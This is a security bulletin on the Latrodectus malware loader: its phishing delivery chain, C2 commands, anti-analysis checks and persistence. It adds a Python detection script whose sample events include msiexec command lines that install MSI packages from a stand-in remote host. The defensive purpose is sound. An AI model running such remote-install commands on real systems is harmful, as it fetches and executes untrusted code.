Latrodectus Malware Loader Emerges as IcedID's Successor in Phishing Campaigns

Researchers at Elastic Security Labs have observed an uptick in email campaigns since early March 2024 delivering Latrodectus malware. Latrodectus is a malware loader that was identified in October 2023 by Walmart researchers and is believed to be a successor of the IcedID malware. Since its emergence, Latrodectus has gained popularity within the cybercriminal community, as it offers a range of capabilities for deploying additional payloads and conducting follow-on activity after initial compromise. In total, Latrodectus supports 11 different commands, two of which are newly added and designed to enumerate running processes and list files in the desktop directory. Notably, one of the command handlers supported by Latrodectus is designed to download and execute the IcedID malware loader. Although this command has not been observed being used in attacks, researchers suspect that Latrodectus is being actively developed as a replacement for IcedID and that the handler will remain until the authors are satisfied with Latrodectus’ capabilities.

Security Officer Comments:
In the latest campaign, Latrodectus is distributed in spam emails containing large JavaScript files that use WMI to invoke msiexec.exe and install a malicious MSI file from a remote WebDAV share, which in turn deploys the final payload, in this case Latrodectus. Latrodectus operates as a bot: its core functionality is driven through its command handlers. Once executed, Latrodectus establishes communication with the C2 server over HTTPS to receive commands that allow it to collect system information; update, restart, and terminate itself; and run shellcode, DLLs, and executables. According to Elastic Security Labs, Latrodectus performs several anti-analysis checks, including detecting a debugger by inspecting the BeingDebugged flag in the Process Environment Block (PEB) and validating that the host is not a sandbox or virtual machine by checking for an unusually low number of running processes. Latrodectus also maintains persistence on targeted systems by creating scheduled tasks via the Windows Component Object Model (COM).
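The delivery chain described above (JavaScript attachment, WMI, msiexec.exe fetching an MSI from a remote share) leaves a distinctive trace in process-creation telemetry that defenders can hunt for. The following is an added example written for this summary; it is not Elastic Security Labs' code and is unrelated to their published YARA rules. It runs simple detection logic over constructed process-creation events shaped like Sysmon Event ID 1 records (parent image, image, command line). The sample events, the IP address 203.0.113.10, and the file names are constructed; the assumption that a WMI-initiated msiexec.exe appears with WmiPrvSE.exe as its parent is ours, not something the summary states.

```python
import re

# Constructed sample process-creation events, modelled on the parent/image/command-line
# fields a Sysmon Event ID 1 or EDR record carries. These are not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i \\203.0.113.10@80\share\update.msi /qn"},
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\tool.msi"'},
    {"id": 3, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /q /i https://203.0.113.10/pkg/setup.msi"},
    {"id": 4, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\alice\Downloads\invoice_0423.js"},
    {"id": 5, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"C:\Windows\System32\msiexec.exe /V"},
]

# msiexec install switches (/i or /package) followed by a source that is an http(s) URL
# or a UNC path. WebDAV UNC paths take the form \\host@SSL@443\DavWWWRoot\..., so the
# optional @SSL and @port parts are allowed after the host name.
REMOTE_MSI_SOURCE = re.compile(
    r"/(?:i|package)\s+\"?(?:https?://|\\\\[\w.-]+(?:@SSL)?(?:@\d+)?\\)", re.IGNORECASE)

# Parents that normally sit between a script and msiexec in this delivery chain.
# Assumption: WMI Win32_Process/Win32_Product calls run under WmiPrvSE.exe.
SUSPICIOUS_PARENTS = ("wmiprvse.exe", "wscript.exe", "cscript.exe", "mshta.exe")

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\appdata\\")


def basename(path):
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return (severity, reason) for one process-creation event, or None if nothing matched."""
    image = basename(event["image"])
    parent = basename(event["parent"])
    cmd = event["cmdline"]
    if image == "msiexec.exe" and REMOTE_MSI_SOURCE.search(cmd):
        if parent in SUSPICIOUS_PARENTS:
            return ("high", "msiexec installing a remote MSI, spawned via WMI or a script host")
        return ("medium", "msiexec installing an MSI from a remote URL or UNC share")
    lowered = cmd.lower().rstrip('"')
    if image in SCRIPT_HOSTS and lowered.endswith(".js") \
            and any(p in lowered for p in USER_WRITABLE):
        return ("low", "script host running a .js file from a user-writable directory")
    return None


def scan(events):
    """Run evaluate() over all events; return a list of (event id, severity, reason)."""
    findings = []
    for ev in events:
        verdict = evaluate(ev)
        if verdict:
            findings.append((ev["id"], verdict[0], verdict[1]))
    return findings


if __name__ == "__main__":
    for event_id, severity, reason in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: [{severity}] {reason}")
```

Event 2 (a local MSI launched from Explorer) and event 5 (the msiexec service stub) are left alone, while the two remote installs initiated under WmiPrvSE.exe are rated high and the .js launched from a Downloads folder is rated low; in a real deployment the low-severity hit is mostly useful as context to correlate with the msiexec event that follows it.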

Suggested Corrections:
Given that phishing is the primary distribution vector for malware loaders like Latrodectus, organizations should be on the lookout for emails from unknown senders containing malicious links and attachments. Regular tabletop exercises can help increase employee awareness and preparedness to deter potential attacks.

Elastic Security Labs has published a set of IOCs and YARA rules for detection purposes which can be accessed using the link below: